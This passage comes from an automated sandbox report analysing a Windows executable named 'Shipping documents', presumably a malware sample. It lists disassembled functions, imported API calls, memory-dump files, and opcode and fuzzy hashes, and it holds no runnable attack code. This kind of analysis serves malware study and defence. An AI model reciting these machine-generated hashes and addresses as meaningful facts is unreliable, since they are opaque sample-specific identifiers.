                                                                                                          • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                                                          • String ID: crts
                                                                                                          • API String ID: 943502515-3724388283
                                                                                                          • Opcode ID: 529e37b86e0cb06f9ed43835dc92f00344189a4a835cae890eb44c126e03fe94
                                                                                                          • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                                                          • Opcode Fuzzy Hash: 529e37b86e0cb06f9ed43835dc92f00344189a4a835cae890eb44c126e03fe94
                                                                                                          • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                                                          Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                                                          • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                                                          • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$LabelVolume
                                                                                                          • String ID: \VH
                                                                                                          • API String ID: 2006950084-234962358
                                                                                                          • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                          • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                                                          • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                          • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                                                          Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • GetMenuItemInfoW.USER32 ref: 00449727
                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                                                          • DrawMenuBar.USER32 ref: 00449761
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$InfoItem$Draw_malloc
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 772068139-4108050209
                                                                                                          • Opcode ID: 15a76c8cdafcabc0d330a2bd3afc87876622b04de3c231e264bb1fcb70d0c272
                                                                                                          • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                                                          • Opcode Fuzzy Hash: 15a76c8cdafcabc0d330a2bd3afc87876622b04de3c231e264bb1fcb70d0c272
                                                                                                          • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                                                          Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$_wcscpy
                                                                                                          • String ID: 3, 3, 8, 1
                                                                                                          • API String ID: 3469035223-357260408
                                                                                                          • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                          • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                                                          • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                          • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                                                          Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                                                          • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                          • API String ID: 2574300362-3530519716
                                                                                                          • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                          • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                                                          • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                          • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                                                          Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                                                          • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                          • API String ID: 2574300362-275556492
                                                                                                          • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                          • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                                                          • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                          • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                                                          Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                                                          • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                          • API String ID: 2574300362-58917771
                                                                                                          • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                          • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                                                          • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                          • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                                                          Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                          • API String ID: 2574300362-4033151799
                                                                                                          • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                          • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                                          • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                          • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                                          Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                                                          • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                                                                          • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                                                          • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                                                                          Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$AllocClearCopyInitString
                                                                                                          • String ID:
                                                                                                          • API String ID: 2808897238-0
                                                                                                          • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                          • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                                          • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                          • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                                          Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                                                          • __itow.LIBCMT ref: 004699CD
                                                                                                            • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                                                          • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                                                          • __itow.LIBCMT ref: 00469A97
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$__itow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3379773720-0
                                                                                                          • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                          • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                                                          • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                          • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                                                          Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ClientMoveRectScreen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3880355969-0
                                                                                                          • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                          • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                                                          • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                          • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                                                          Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2782032738-0
                                                                                                          • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                          • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                                                          • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                          • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                                                          Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                                          • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                                          • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1352109105-0
                                                                                                          • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                          • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                                                          • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                          • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                                                          Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
